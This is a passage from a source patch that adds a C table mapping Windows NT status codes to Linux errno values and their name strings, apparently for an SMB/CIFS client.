++	{STATUS_NETWORK_ACCESS_DENIED, -EACCES, "STATUS_NETWORK_ACCESS_DENIED"},
++	{STATUS_BAD_DEVICE_TYPE, -EIO, "STATUS_BAD_DEVICE_TYPE"},
++	{STATUS_BAD_NETWORK_NAME, -ENOENT, "STATUS_BAD_NETWORK_NAME"},
++	{STATUS_TOO_MANY_NAMES, -EIO, "STATUS_TOO_MANY_NAMES"},
++	{STATUS_TOO_MANY_SESSIONS, -EIO, "STATUS_TOO_MANY_SESSIONS"},
++	{STATUS_SHARING_PAUSED, -EIO, "STATUS_SHARING_PAUSED"},
++	{STATUS_REQUEST_NOT_ACCEPTED, -EIO, "STATUS_REQUEST_NOT_ACCEPTED"},
++	{STATUS_REDIRECTOR_PAUSED, -EIO, "STATUS_REDIRECTOR_PAUSED"},
++	{STATUS_NET_WRITE_FAULT, -EIO, "STATUS_NET_WRITE_FAULT"},
++	{STATUS_PROFILING_AT_LIMIT, -EIO, "STATUS_PROFILING_AT_LIMIT"},
++	{STATUS_NOT_SAME_DEVICE, -EXDEV, "STATUS_NOT_SAME_DEVICE"},
++	{STATUS_FILE_RENAMED, -EIO, "STATUS_FILE_RENAMED"},
++	{STATUS_VIRTUAL_CIRCUIT_CLOSED, -EIO, "STATUS_VIRTUAL_CIRCUIT_CLOSED"},
++	{STATUS_NO_SECURITY_ON_OBJECT, -EIO, "STATUS_NO_SECURITY_ON_OBJECT"},
++	{STATUS_CANT_WAIT, -EIO, "STATUS_CANT_WAIT"},
++	{STATUS_PIPE_EMPTY, -EIO, "STATUS_PIPE_EMPTY"},
++	{STATUS_CANT_ACCESS_DOMAIN_INFO, -EIO,
++	"STATUS_CANT_ACCESS_DOMAIN_INFO"},
++	{STATUS_CANT_TERMINATE_SELF, -EIO, "STATUS_CANT_TERMINATE_SELF"},
++	{STATUS_INVALID_SERVER_STATE, -EIO, "STATUS_INVALID_SERVER_STATE"},
++	{STATUS_INVALID_DOMAIN_STATE, -EIO, "STATUS_INVALID_DOMAIN_STATE"},
++	{STATUS_INVALID_DOMAIN_ROLE, -EIO, "STATUS_INVALID_DOMAIN_ROLE"},
++	{STATUS_NO_SUCH_DOMAIN, -EIO, "STATUS_NO_SUCH_DOMAIN"},
++	{STATUS_DOMAIN_EXISTS, -EIO, "STATUS_DOMAIN_EXISTS"},
++	{STATUS_DOMAIN_LIMIT_EXCEEDED, -EIO, "STATUS_DOMAIN_LIMIT_EXCEEDED"},
++	{STATUS_OPLOCK_NOT_GRANTED, -EIO, "STATUS_OPLOCK_NOT_GRANTED"},
++	{STATUS_INVALID_OPLOCK_PROTOCOL, -EIO,
++	"STATUS_INVALID_OPLOCK_PROTOCOL"},
++	{STATUS_INTERNAL_DB_CORRUPTION, -EIO, "STATUS_INTERNAL_DB_CORRUPTION"},
++	{STATUS_INTERNAL_ERROR, -EIO, "STATUS_INTERNAL_ERROR"},
++	{STATUS_GENERIC_NOT_MAPPED, -EIO, "STATUS_GENERIC_NOT_MAPPED"},
++	{STATUS_BAD_DESCRIPTOR_FORMAT, -EIO, "STATUS_BAD_DESCRIPTOR_FORMAT"},
++	{STATUS_INVALID_USER_BUFFER, -EIO, "STATUS_INVALID_USER_BUFFER"},
++	{STATUS_UNEXPECTED_IO_ERROR, -EIO, "STATUS_UNEXPECTED_IO_ERROR"},
++	{STATUS_UNEXPECTED_MM_CREATE_ERR, -EIO,
++	"STATUS_UNEXPECTED_MM_CREATE_ERR"},
++	{STATUS_UNEXPECTED_MM_MAP_ERROR, -EIO,
++	"STATUS_UNEXPECTED_MM_MAP_ERROR"},
++	{STATUS_UNEXPECTED_MM_EXTEND_ERR, -EIO,
++	"STATUS_UNEXPECTED_MM_EXTEND_ERR"},
++	{STATUS_NOT_LOGON_PROCESS, -EIO, "STATUS_NOT_LOGON_PROCESS"},
++	{STATUS_LOGON_SESSION_EXISTS, -EIO, "STATUS_LOGON_SESSION_EXISTS"},
++	{STATUS_INVALID_PARAMETER_1, -EINVAL, "STATUS_INVALID_PARAMETER_1"},
++	{STATUS_INVALID_PARAMETER_2, -EINVAL, "STATUS_INVALID_PARAMETER_2"},
++	{STATUS_INVALID_PARAMETER_3, -EINVAL, "STATUS_INVALID_PARAMETER_3"},
++	{STATUS_INVALID_PARAMETER_4, -EINVAL, "STATUS_INVALID_PARAMETER_4"},
++	{STATUS_INVALID_PARAMETER_5, -EINVAL, "STATUS_INVALID_PARAMETER_5"},
++	{STATUS_INVALID_PARAMETER_6, -EINVAL, "STATUS_INVALID_PARAMETER_6"},
++	{STATUS_INVALID_PARAMETER_7, -EINVAL, "STATUS_INVALID_PARAMETER_7"},
++	{STATUS_INVALID_PARAMETER_8, -EINVAL, "STATUS_INVALID_PARAMETER_8"},
++	{STATUS_INVALID_PARAMETER_9, -EINVAL, "STATUS_INVALID_PARAMETER_9"},
++	{STATUS_INVALID_PARAMETER_10, -EINVAL, "STATUS_INVALID_PARAMETER_10"},
++	{STATUS_INVALID_PARAMETER_11, -EINVAL, "STATUS_INVALID_PARAMETER_11"},
++	{STATUS_INVALID_PARAMETER_12, -EINVAL, "STATUS_INVALID_PARAMETER_12"},
++	{STATUS_REDIRECTOR_NOT_STARTED, -EIO, "STATUS_REDIRECTOR_NOT_STARTED"},
++	{STATUS_REDIRECTOR_STARTED, -EIO, "STATUS_REDIRECTOR_STARTED"},
++	{STATUS_STACK_OVERFLOW, -EIO, "STATUS_STACK_OVERFLOW"},
++	{STATUS_NO_SUCH_PACKAGE, -EIO, "STATUS_NO_SUCH_PACKAGE"},
++	{STATUS_BAD_FUNCTION_TABLE, -EIO, "STATUS_BAD_FUNCTION_TABLE"},
++	{STATUS_VARIABLE_NOT_FOUND, -EIO, "STATUS_VARIABLE_NOT_FOUND"},
++	{STATUS_DIRECTORY_NOT_EMPTY, -ENOTEMPTY, "STATUS_DIRECTORY_NOT_EMPTY"},
++	{STATUS_FILE_CORRUPT_ERROR, -EIO, "STATUS_FILE_CORRUPT_ERROR"},
++	{STATUS_NOT_A_DIRECTORY, -ENOTDIR, "STATUS_NOT_A_DIRECTORY"},
++	{STATUS_BAD_LOGON_SESSION_STATE, -EIO,
++	"STATUS_BAD_LOGON_SESSION_STATE"},
++	{STATUS_LOGON_SESSION_COLLISION, -EIO,
++	"STATUS_LOGON_SESSION_COLLISION"},
++	{STATUS_NAME_TOO_LONG, -ENAMETOOLONG, "STATUS_NAME_TOO_LONG"},
++	{STATUS_FILES_OPEN, -EIO, "STATUS_FILES_OPEN"},
++	{STATUS_CONNECTION_IN_USE, -EIO, "STATUS_CONNECTION_IN_USE"},
++	{STATUS_MESSAGE_NOT_FOUND, -EIO, "STATUS_MESSAGE_NOT_FOUND"},
++	{STATUS_PROCESS_IS_TERMINATING, -EIO, "STATUS_PROCESS_IS_TERMINATING"},
++	{STATUS_INVALID_LOGON_TYPE, -EIO, "STATUS_INVALID_LOGON_TYPE"},
++	{STATUS_NO_GUID_TRANSLATION, -EIO, "STATUS_NO_GUID_TRANSLATION"},
++	{STATUS_CANNOT_IMPERSONATE, -EIO, "STATUS_CANNOT_IMPERSONATE"},
++	{STATUS_IMAGE_ALREADY_LOADED, -EIO, "STATUS_IMAGE_ALREADY_LOADED"},
++	{STATUS_ABIOS_NOT_PRESENT, -EIO, "STATUS_ABIOS_NOT_PRESENT"},
++	{STATUS_ABIOS_LID_NOT_EXIST, -EIO, "STATUS_ABIOS_LID_NOT_EXIST"},
++	{STATUS_ABIOS_LID_ALREADY_OWNED, -EIO,
++	"STATUS_ABIOS_LID_ALREADY_OWNED"},
++	{STATUS_ABIOS_NOT_LID_OWNER, -EIO, "STATUS_ABIOS_NOT_LID_OWNER"},
++	{STATUS_ABIOS_INVALID_COMMAND, -EIO, "STATUS_ABIOS_INVALID_COMMAND"},
++	{STATUS_ABIOS_INVALID_LID, -EIO, "STATUS_ABIOS_INVALID_LID"},
++	{STATUS_ABIOS_SELECTOR_NOT_AVAILABLE, -EIO,
++	"STATUS_ABIOS_SELECTOR_NOT_AVAILABLE"},
++	{STATUS_ABIOS_INVALID_SELECTOR, -EIO, "STATUS_ABIOS_INVALID_SELECTOR"},
++	{STATUS_NO_LDT, -EIO, "STATUS_NO_LDT"},
++	{STATUS_INVALID_LDT_SIZE, -EIO, "STATUS_INVALID_LDT_SIZE"},
++	{STATUS_INVALID_LDT_OFFSET, -EIO, "STATUS_INVALID_LDT_OFFSET"},
++	{STATUS_INVALID_LDT_DESCRIPTOR, -EIO, "STATUS_INVALID_LDT_DESCRIPTOR"},
++	{STATUS_INVALID_IMAGE_NE_FORMAT, -EIO,
++	"STATUS_INVALID_IMAGE_NE_FORMAT"},
++	{STATUS_RXACT_INVALID_STATE, -EIO, "STATUS_RXACT_INVALID_STATE"},
++	{STATUS_RXACT_COMMIT_FAILURE, -EIO, "STATUS_RXACT_COMMIT_FAILURE"},
++	{STATUS_MAPPED_FILE_SIZE_ZERO, -EIO, "STATUS_MAPPED_FILE_SIZE_ZERO"},
++	{STATUS_TOO_MANY_OPENED_FILES, -EMFILE, "STATUS_TOO_MANY_OPENED_FILES"},
++	{STATUS_CANCELLED, -EIO, "STATUS_CANCELLED"},
++	{STATUS_CANNOT_DELETE, -EACCES, "STATUS_CANNOT_DELETE"},
++	{STATUS_INVALID_COMPUTER_NAME, -EIO, "STATUS_INVALID_COMPUTER_NAME"},
++	{STATUS_FILE_DELETED, -EIO, "STATUS_FILE_DELETED"},
++	{STATUS_SPECIAL_ACCOUNT, -EIO, "STATUS_SPECIAL_ACCOUNT"},
++	{STATUS_SPECIAL_GROUP, -EIO, "STATUS_SPECIAL_GROUP"},
++	{STATUS_SPECIAL_USER, -EIO, "STATUS_SPECIAL_USER"},
++	{STATUS_MEMBERS_PRIMARY_GROUP, -EIO, "STATUS_MEMBERS_PRIMARY_GROUP"},
++	{STATUS_FILE_CLOSED, -EBADF, "STATUS_FILE_CLOSED"},
++	{STATUS_TOO_MANY_THREADS, -EIO, "STATUS_TOO_MANY_THREADS"},
++	{STATUS_THREAD_NOT_IN_PROCESS, -EIO, "STATUS_THREAD_NOT_IN_PROCESS"},
++	{STATUS_TOKEN_ALREADY_IN_USE, -EIO, "STATUS_TOKEN_ALREADY_IN_USE"},
++	{STATUS_PAGEFILE_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_PAGEFILE_QUOTA_EXCEEDED"},
++	{STATUS_COMMITMENT_LIMIT, -EIO, "STATUS_COMMITMENT_LIMIT"},
++	{STATUS_INVALID_IMAGE_LE_FORMAT, -EIO,
++	"STATUS_INVALID_IMAGE_LE_FORMAT"},
++	{STATUS_INVALID_IMAGE_NOT_MZ, -EIO, "STATUS_INVALID_IMAGE_NOT_MZ"},
++	{STATUS_INVALID_IMAGE_PROTECT, -EIO, "STATUS_INVALID_IMAGE_PROTECT"},
++	{STATUS_INVALID_IMAGE_WIN_16, -EIO, "STATUS_INVALID_IMAGE_WIN_16"},
++	{STATUS_LOGON_SERVER_CONFLICT, -EIO, "STATUS_LOGON_SERVER_CONFLICT"},
++	{STATUS_TIME_DIFFERENCE_AT_DC, -EIO, "STATUS_TIME_DIFFERENCE_AT_DC"},
++	{STATUS_SYNCHRONIZATION_REQUIRED, -EIO,
++	"STATUS_SYNCHRONIZATION_REQUIRED"},
++	{STATUS_DLL_NOT_FOUND, -ENOENT, "STATUS_DLL_NOT_FOUND"},
++	{STATUS_OPEN_FAILED, -EIO, "STATUS_OPEN_FAILED"},
++	{STATUS_IO_PRIVILEGE_FAILED, -EIO, "STATUS_IO_PRIVILEGE_FAILED"},
++	{STATUS_ORDINAL_NOT_FOUND, -EIO, "STATUS_ORDINAL_NOT_FOUND"},
++	{STATUS_ENTRYPOINT_NOT_FOUND, -EIO, "STATUS_ENTRYPOINT_NOT_FOUND"},
++	{STATUS_CONTROL_C_EXIT, -EIO, "STATUS_CONTROL_C_EXIT"},
++	{STATUS_LOCAL_DISCONNECT, -EIO, "STATUS_LOCAL_DISCONNECT"},
++	{STATUS_REMOTE_DISCONNECT, -ESHUTDOWN, "STATUS_REMOTE_DISCONNECT"},
++	{STATUS_REMOTE_RESOURCES, -EIO, "STATUS_REMOTE_RESOURCES"},
++	{STATUS_LINK_FAILED, -EXDEV, "STATUS_LINK_FAILED"},
++	{STATUS_LINK_TIMEOUT, -ETIMEDOUT, "STATUS_LINK_TIMEOUT"},
++	{STATUS_INVALID_CONNECTION, -EIO, "STATUS_INVALID_CONNECTION"},
++	{STATUS_INVALID_ADDRESS, -EIO, "STATUS_INVALID_ADDRESS"},
++	{STATUS_DLL_INIT_FAILED, -EIO, "STATUS_DLL_INIT_FAILED"},
++	{STATUS_MISSING_SYSTEMFILE, -EIO, "STATUS_MISSING_SYSTEMFILE"},
++	{STATUS_UNHANDLED_EXCEPTION, -EIO, "STATUS_UNHANDLED_EXCEPTION"},
++	{STATUS_APP_INIT_FAILURE, -EIO, "STATUS_APP_INIT_FAILURE"},
++	{STATUS_PAGEFILE_CREATE_FAILED, -EIO, "STATUS_PAGEFILE_CREATE_FAILED"},
++	{STATUS_NO_PAGEFILE, -EIO, "STATUS_NO_PAGEFILE"},
++	{STATUS_INVALID_LEVEL, -EIO, "STATUS_INVALID_LEVEL"},
++	{STATUS_WRONG_PASSWORD_CORE, -EIO, "STATUS_WRONG_PASSWORD_CORE"},
++	{STATUS_ILLEGAL_FLOAT_CONTEXT, -EIO, "STATUS_ILLEGAL_FLOAT_CONTEXT"},
++	{STATUS_PIPE_BROKEN, -EPIPE, "STATUS_PIPE_BROKEN"},
++	{STATUS_REGISTRY_CORRUPT, -EIO, "STATUS_REGISTRY_CORRUPT"},
++	{STATUS_REGISTRY_IO_FAILED, -EIO, "STATUS_REGISTRY_IO_FAILED"},
++	{STATUS_NO_EVENT_PAIR, -EIO, "STATUS_NO_EVENT_PAIR"},
++	{STATUS_UNRECOGNIZED_VOLUME, -EIO, "STATUS_UNRECOGNIZED_VOLUME"},
++	{STATUS_SERIAL_NO_DEVICE_INITED, -EIO,
++	"STATUS_SERIAL_NO_DEVICE_INITED"},
++	{STATUS_NO_SUCH_ALIAS, -EIO, "STATUS_NO_SUCH_ALIAS"},
++	{STATUS_MEMBER_NOT_IN_ALIAS, -EIO, "STATUS_MEMBER_NOT_IN_ALIAS"},
++	{STATUS_MEMBER_IN_ALIAS, -EIO, "STATUS_MEMBER_IN_ALIAS"},
++	{STATUS_ALIAS_EXISTS, -EIO, "STATUS_ALIAS_EXISTS"},
++	{STATUS_LOGON_NOT_GRANTED, -EIO, "STATUS_LOGON_NOT_GRANTED"},
++	{STATUS_TOO_MANY_SECRETS, -EIO, "STATUS_TOO_MANY_SECRETS"},
++	{STATUS_SECRET_TOO_LONG, -EIO, "STATUS_SECRET_TOO_LONG"},
++	{STATUS_INTERNAL_DB_ERROR, -EIO, "STATUS_INTERNAL_DB_ERROR"},
++	{STATUS_FULLSCREEN_MODE, -EIO, "STATUS_FULLSCREEN_MODE"},
++	{STATUS_TOO_MANY_CONTEXT_IDS, -EIO, "STATUS_TOO_MANY_CONTEXT_IDS"},
++	{STATUS_LOGON_TYPE_NOT_GRANTED, -EIO, "STATUS_LOGON_TYPE_NOT_GRANTED"},
++	{STATUS_NOT_REGISTRY_FILE, -EIO, "STATUS_NOT_REGISTRY_FILE"},
++	{STATUS_NT_CROSS_ENCRYPTION_REQUIRED, -EIO,
++	"STATUS_NT_CROSS_ENCRYPTION_REQUIRED"},
++	{STATUS_DOMAIN_CTRLR_CONFIG_ERROR, -EIO,
++	"STATUS_DOMAIN_CTRLR_CONFIG_ERROR"},
++	{STATUS_FT_MISSING_MEMBER, -EIO, "STATUS_FT_MISSING_MEMBER"},
++	{STATUS_ILL_FORMED_SERVICE_ENTRY, -EIO,
++	"STATUS_ILL_FORMED_SERVICE_ENTRY"},
++	{STATUS_ILLEGAL_CHARACTER, -EIO, "STATUS_ILLEGAL_CHARACTER"},
++	{STATUS_UNMAPPABLE_CHARACTER, -EIO, "STATUS_UNMAPPABLE_CHARACTER"},
++	{STATUS_UNDEFINED_CHARACTER, -EIO, "STATUS_UNDEFINED_CHARACTER"},
++	{STATUS_FLOPPY_VOLUME, -EIO, "STATUS_FLOPPY_VOLUME"},
++	{STATUS_FLOPPY_ID_MARK_NOT_FOUND, -EIO,
++	"STATUS_FLOPPY_ID_MARK_NOT_FOUND"},
++	{STATUS_FLOPPY_WRONG_CYLINDER, -EIO, "STATUS_FLOPPY_WRONG_CYLINDER"},
++	{STATUS_FLOPPY_UNKNOWN_ERROR, -EIO, "STATUS_FLOPPY_UNKNOWN_ERROR"},
++	{STATUS_FLOPPY_BAD_REGISTERS, -EIO, "STATUS_FLOPPY_BAD_REGISTERS"},
++	{STATUS_DISK_RECALIBRATE_FAILED, -EIO,
++	"STATUS_DISK_RECALIBRATE_FAILED"},
++	{STATUS_DISK_OPERATION_FAILED, -EIO, "STATUS_DISK_OPERATION_FAILED"},
++	{STATUS_DISK_RESET_FAILED, -EIO, "STATUS_DISK_RESET_FAILED"},
++	{STATUS_SHARED_IRQ_BUSY, -EBUSY, "STATUS_SHARED_IRQ_BUSY"},
++	{STATUS_FT_ORPHANING, -EIO, "STATUS_FT_ORPHANING"},
++	{STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT, -EIO,
++	"STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT"},
++	{STATUS_PARTITION_FAILURE, -EIO, "STATUS_PARTITION_FAILURE"},
++	{STATUS_INVALID_BLOCK_LENGTH, -EIO, "STATUS_INVALID_BLOCK_LENGTH"},
++	{STATUS_DEVICE_NOT_PARTITIONED, -EIO, "STATUS_DEVICE_NOT_PARTITIONED"},
++	{STATUS_UNABLE_TO_LOCK_MEDIA, -EIO, "STATUS_UNABLE_TO_LOCK_MEDIA"},
++	{STATUS_UNABLE_TO_UNLOAD_MEDIA, -EIO, "STATUS_UNABLE_TO_UNLOAD_MEDIA"},
++	{STATUS_EOM_OVERFLOW, -EIO, "STATUS_EOM_OVERFLOW"},
++	{STATUS_NO_MEDIA, -EIO, "STATUS_NO_MEDIA"},
++	{STATUS_NO_SUCH_MEMBER, -EIO, "STATUS_NO_SUCH_MEMBER"},
++	{STATUS_INVALID_MEMBER, -EIO, "STATUS_INVALID_MEMBER"},
++	{STATUS_KEY_DELETED, -EIO, "STATUS_KEY_DELETED"},
++	{STATUS_NO_LOG_SPACE, -EIO, "STATUS_NO_LOG_SPACE"},
++	{STATUS_TOO_MANY_SIDS, -EIO, "STATUS_TOO_MANY_SIDS"},
++	{STATUS_LM_CROSS_ENCRYPTION_REQUIRED, -EIO,
++	"STATUS_LM_CROSS_ENCRYPTION_REQUIRED"},
++	{STATUS_KEY_HAS_CHILDREN, -EIO, "STATUS_KEY_HAS_CHILDREN"},
++	{STATUS_CHILD_MUST_BE_VOLATILE, -EIO, "STATUS_CHILD_MUST_BE_VOLATILE"},
++	{STATUS_DEVICE_CONFIGURATION_ERROR, -EIO,
++	"STATUS_DEVICE_CONFIGURATION_ERROR"},
++	{STATUS_DRIVER_INTERNAL_ERROR, -EIO, "STATUS_DRIVER_INTERNAL_ERROR"},
++	{STATUS_INVALID_DEVICE_STATE, -EIO, "STATUS_INVALID_DEVICE_STATE"},
++	{STATUS_IO_DEVICE_ERROR, -EIO, "STATUS_IO_DEVICE_ERROR"},
++	{STATUS_DEVICE_PROTOCOL_ERROR, -EIO, "STATUS_DEVICE_PROTOCOL_ERROR"},
++	{STATUS_BACKUP_CONTROLLER, -EIO, "STATUS_BACKUP_CONTROLLER"},
++	{STATUS_LOG_FILE_FULL, -EIO, "STATUS_LOG_FILE_FULL"},
++	{STATUS_TOO_LATE, -EIO, "STATUS_TOO_LATE"},
++	{STATUS_NO_TRUST_LSA_SECRET, -EIO, "STATUS_NO_TRUST_LSA_SECRET"},
++	{STATUS_NO_TRUST_SAM_ACCOUNT, -EIO, "STATUS_NO_TRUST_SAM_ACCOUNT"},
++	{STATUS_TRUSTED_DOMAIN_FAILURE, -EIO, "STATUS_TRUSTED_DOMAIN_FAILURE"},
++	{STATUS_TRUSTED_RELATIONSHIP_FAILURE, -EIO,
++	"STATUS_TRUSTED_RELATIONSHIP_FAILURE"},
++	{STATUS_EVENTLOG_FILE_CORRUPT, -EIO, "STATUS_EVENTLOG_FILE_CORRUPT"},
++	{STATUS_EVENTLOG_CANT_START, -EIO, "STATUS_EVENTLOG_CANT_START"},
++	{STATUS_TRUST_FAILURE, -EIO, "STATUS_TRUST_FAILURE"},
++	{STATUS_MUTANT_LIMIT_EXCEEDED, -EIO, "STATUS_MUTANT_LIMIT_EXCEEDED"},
++	{STATUS_NETLOGON_NOT_STARTED, -EIO, "STATUS_NETLOGON_NOT_STARTED"},
++	{STATUS_ACCOUNT_EXPIRED, -EKEYEXPIRED, "STATUS_ACCOUNT_EXPIRED"},
++	{STATUS_POSSIBLE_DEADLOCK, -EIO, "STATUS_POSSIBLE_DEADLOCK"},
++	{STATUS_NETWORK_CREDENTIAL_CONFLICT, -EIO,
++	"STATUS_NETWORK_CREDENTIAL_CONFLICT"},
++	{STATUS_REMOTE_SESSION_LIMIT, -EIO, "STATUS_REMOTE_SESSION_LIMIT"},
++	{STATUS_EVENTLOG_FILE_CHANGED, -EIO, "STATUS_EVENTLOG_FILE_CHANGED"},
++	{STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT, -EIO,
++	"STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT"},
++	{STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, -EIO,
++	"STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT"},
++	{STATUS_NOLOGON_SERVER_TRUST_ACCOUNT, -EIO,
++	"STATUS_NOLOGON_SERVER_TRUST_ACCOUNT"},
++	{STATUS_DOMAIN_TRUST_INCONSISTENT, -EIO,
++	"STATUS_DOMAIN_TRUST_INCONSISTENT"},
++	{STATUS_FS_DRIVER_REQUIRED, -EOPNOTSUPP, "STATUS_FS_DRIVER_REQUIRED"},
++	{STATUS_IMAGE_ALREADY_LOADED_AS_DLL, -EIO,
++	"STATUS_IMAGE_ALREADY_LOADED_AS_DLL"},
++	{STATUS_NETWORK_OPEN_RESTRICTION, -EIO,
++	"STATUS_NETWORK_OPEN_RESTRICTION"},
++	{STATUS_NO_USER_SESSION_KEY, -EIO, "STATUS_NO_USER_SESSION_KEY"},
++	{STATUS_USER_SESSION_DELETED, -EIO, "STATUS_USER_SESSION_DELETED"},
++	{STATUS_RESOURCE_LANG_NOT_FOUND, -EIO,
++	"STATUS_RESOURCE_LANG_NOT_FOUND"},
++	{STATUS_INSUFF_SERVER_RESOURCES, -EIO,
++	"STATUS_INSUFF_SERVER_RESOURCES"},
++	{STATUS_INVALID_BUFFER_SIZE, -EIO, "STATUS_INVALID_BUFFER_SIZE"},
++	{STATUS_INVALID_ADDRESS_COMPONENT, -EIO,
++	"STATUS_INVALID_ADDRESS_COMPONENT"},
++	{STATUS_INVALID_ADDRESS_WILDCARD, -EIO,
++	"STATUS_INVALID_ADDRESS_WILDCARD"},
++	{STATUS_TOO_MANY_ADDRESSES, -EIO, "STATUS_TOO_MANY_ADDRESSES"},
++	{STATUS_ADDRESS_ALREADY_EXISTS, -EADDRINUSE,
++	"STATUS_ADDRESS_ALREADY_EXISTS"},
++	{STATUS_ADDRESS_CLOSED, -EIO, "STATUS_ADDRESS_CLOSED"},
++	{STATUS_CONNECTION_DISCONNECTED, -ECONNABORTED,
++	"STATUS_CONNECTION_DISCONNECTED"},
++	{STATUS_CONNECTION_RESET, -ENETRESET, "STATUS_CONNECTION_RESET"},
++	{STATUS_TOO_MANY_NODES, -EIO, "STATUS_TOO_MANY_NODES"},
++	{STATUS_TRANSACTION_ABORTED, -EIO, "STATUS_TRANSACTION_ABORTED"},
++	{STATUS_TRANSACTION_TIMED_OUT, -EIO, "STATUS_TRANSACTION_TIMED_OUT"},
++	{STATUS_TRANSACTION_NO_RELEASE, -EIO, "STATUS_TRANSACTION_NO_RELEASE"},
++	{STATUS_TRANSACTION_NO_MATCH, -EIO, "STATUS_TRANSACTION_NO_MATCH"},
++	{STATUS_TRANSACTION_RESPONDED, -EIO, "STATUS_TRANSACTION_RESPONDED"},
++	{STATUS_TRANSACTION_INVALID_ID, -EIO, "STATUS_TRANSACTION_INVALID_ID"},
++	{STATUS_TRANSACTION_INVALID_TYPE, -EIO,
++	"STATUS_TRANSACTION_INVALID_TYPE"},
++	{STATUS_NOT_SERVER_SESSION, -EIO, "STATUS_NOT_SERVER_SESSION"},
++	{STATUS_NOT_CLIENT_SESSION, -EIO, "STATUS_NOT_CLIENT_SESSION"},
++	{STATUS_CANNOT_LOAD_REGISTRY_FILE, -EIO,
++	"STATUS_CANNOT_LOAD_REGISTRY_FILE"},
++	{STATUS_DEBUG_ATTACH_FAILED, -EIO, "STATUS_DEBUG_ATTACH_FAILED"},
++	{STATUS_SYSTEM_PROCESS_TERMINATED, -EIO,
++	"STATUS_SYSTEM_PROCESS_TERMINATED"},
++	{STATUS_DATA_NOT_ACCEPTED, -EIO, "STATUS_DATA_NOT_ACCEPTED"},
++	{STATUS_NO_BROWSER_SERVERS_FOUND, -EIO,
++	"STATUS_NO_BROWSER_SERVERS_FOUND"},
++	{STATUS_VDM_HARD_ERROR, -EIO, "STATUS_VDM_HARD_ERROR"},
++	{STATUS_DRIVER_CANCEL_TIMEOUT, -EIO, "STATUS_DRIVER_CANCEL_TIMEOUT"},
++	{STATUS_REPLY_MESSAGE_MISMATCH, -EIO, "STATUS_REPLY_MESSAGE_MISMATCH"},
++	{STATUS_MAPPED_ALIGNMENT, -EIO, "STATUS_MAPPED_ALIGNMENT"},
++	{STATUS_IMAGE_CHECKSUM_MISMATCH, -EIO,
++	"STATUS_IMAGE_CHECKSUM_MISMATCH"},
++	{STATUS_LOST_WRITEBEHIND_DATA, -EIO, "STATUS_LOST_WRITEBEHIND_DATA"},
++	{STATUS_CLIENT_SERVER_PARAMETERS_INVALID, -EIO,
++	"STATUS_CLIENT_SERVER_PARAMETERS_INVALID"},
++	{STATUS_PASSWORD_MUST_CHANGE, -EIO, "STATUS_PASSWORD_MUST_CHANGE"},
++	{STATUS_NOT_FOUND, -ENOENT, "STATUS_NOT_FOUND"},
++	{STATUS_NOT_TINY_STREAM, -EIO, "STATUS_NOT_TINY_STREAM"},
++	{STATUS_RECOVERY_FAILURE, -EIO, "STATUS_RECOVERY_FAILURE"},
++	{STATUS_STACK_OVERFLOW_READ, -EIO, "STATUS_STACK_OVERFLOW_READ"},
++	{STATUS_FAIL_CHECK, -EIO, "STATUS_FAIL_CHECK"},
++	{STATUS_DUPLICATE_OBJECTID, -EIO, "STATUS_DUPLICATE_OBJECTID"},
++	{STATUS_OBJECTID_EXISTS, -EIO, "STATUS_OBJECTID_EXISTS"},
++	{STATUS_CONVERT_TO_LARGE, -EIO, "STATUS_CONVERT_TO_LARGE"},
++	{STATUS_RETRY, -EAGAIN, "STATUS_RETRY"},
++	{STATUS_FOUND_OUT_OF_SCOPE, -EIO, "STATUS_FOUND_OUT_OF_SCOPE"},
++	{STATUS_ALLOCATE_BUCKET, -EIO, "STATUS_ALLOCATE_BUCKET"},
++	{STATUS_PROPSET_NOT_FOUND, -EIO, "STATUS_PROPSET_NOT_FOUND"},
++	{STATUS_MARSHALL_OVERFLOW, -EIO, "STATUS_MARSHALL_OVERFLOW"},
++	{STATUS_INVALID_VARIANT, -EIO, "STATUS_INVALID_VARIANT"},
++	{STATUS_DOMAIN_CONTROLLER_NOT_FOUND, -EIO,
++	"STATUS_DOMAIN_CONTROLLER_NOT_FOUND"},
++	{STATUS_ACCOUNT_LOCKED_OUT, -EACCES, "STATUS_ACCOUNT_LOCKED_OUT"},
++	{STATUS_HANDLE_NOT_CLOSABLE, -EIO, "STATUS_HANDLE_NOT_CLOSABLE"},
++	{STATUS_CONNECTION_REFUSED, -EIO, "STATUS_CONNECTION_REFUSED"},
++	{STATUS_GRACEFUL_DISCONNECT, -EIO, "STATUS_GRACEFUL_DISCONNECT"},
++	{STATUS_ADDRESS_ALREADY_ASSOCIATED, -EIO,
++	"STATUS_ADDRESS_ALREADY_ASSOCIATED"},
++	{STATUS_ADDRESS_NOT_ASSOCIATED, -EIO, "STATUS_ADDRESS_NOT_ASSOCIATED"},
++	{STATUS_CONNECTION_INVALID, -EIO, "STATUS_CONNECTION_INVALID"},
++	{STATUS_CONNECTION_ACTIVE, -EIO, "STATUS_CONNECTION_ACTIVE"},
++	{STATUS_NETWORK_UNREACHABLE, -ENETUNREACH,
++	"STATUS_NETWORK_UNREACHABLE"},
++	{STATUS_HOST_UNREACHABLE, -EHOSTDOWN, "STATUS_HOST_UNREACHABLE"},
++	{STATUS_PROTOCOL_UNREACHABLE, -ENETUNREACH,
++	"STATUS_PROTOCOL_UNREACHABLE"},
++	{STATUS_PORT_UNREACHABLE, -ENETUNREACH, "STATUS_PORT_UNREACHABLE"},
++	{STATUS_REQUEST_ABORTED, -EIO, "STATUS_REQUEST_ABORTED"},
++	{STATUS_CONNECTION_ABORTED, -ECONNABORTED, "STATUS_CONNECTION_ABORTED"},
++	{STATUS_BAD_COMPRESSION_BUFFER, -EIO, "STATUS_BAD_COMPRESSION_BUFFER"},
++	{STATUS_USER_MAPPED_FILE, -EIO, "STATUS_USER_MAPPED_FILE"},
++	{STATUS_AUDIT_FAILED, -EIO, "STATUS_AUDIT_FAILED"},
++	{STATUS_TIMER_RESOLUTION_NOT_SET, -EIO,
++	"STATUS_TIMER_RESOLUTION_NOT_SET"},
++	{STATUS_CONNECTION_COUNT_LIMIT, -EIO, "STATUS_CONNECTION_COUNT_LIMIT"},
++	{STATUS_LOGIN_TIME_RESTRICTION, -EACCES,
